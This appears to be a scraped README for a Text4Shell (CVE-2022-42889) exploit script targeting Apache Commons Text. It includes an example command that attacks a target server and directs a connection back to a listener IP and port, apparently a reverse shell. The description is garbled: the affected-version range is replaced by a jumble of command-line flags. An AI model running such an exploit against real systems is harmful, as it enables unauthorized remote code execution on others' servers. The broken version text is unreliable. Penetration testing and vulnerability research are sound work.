## https://sploitus.com/exploit?id=D38FED82-ED7D-58DB-8777-C5025D10823B
# CVE-2022-42889-text4shell
## Description
This script is a penetration testing tool designed to exploit the CVE-2022-42889 vulnerability, also known as Text4Shell, within Apache Commons Text (versions -p -u -param -L -P
```
### Example
```bash
python3 exploit.py -t 192.168.136.150 -p 8080 -u /search/ -param query -L 192.168.45.215 -P 139
```
## Disclaimer
This tool is intended for educational purposes and authorized penetration testing only. The author is not responsible for any misuse or damage caused by this script.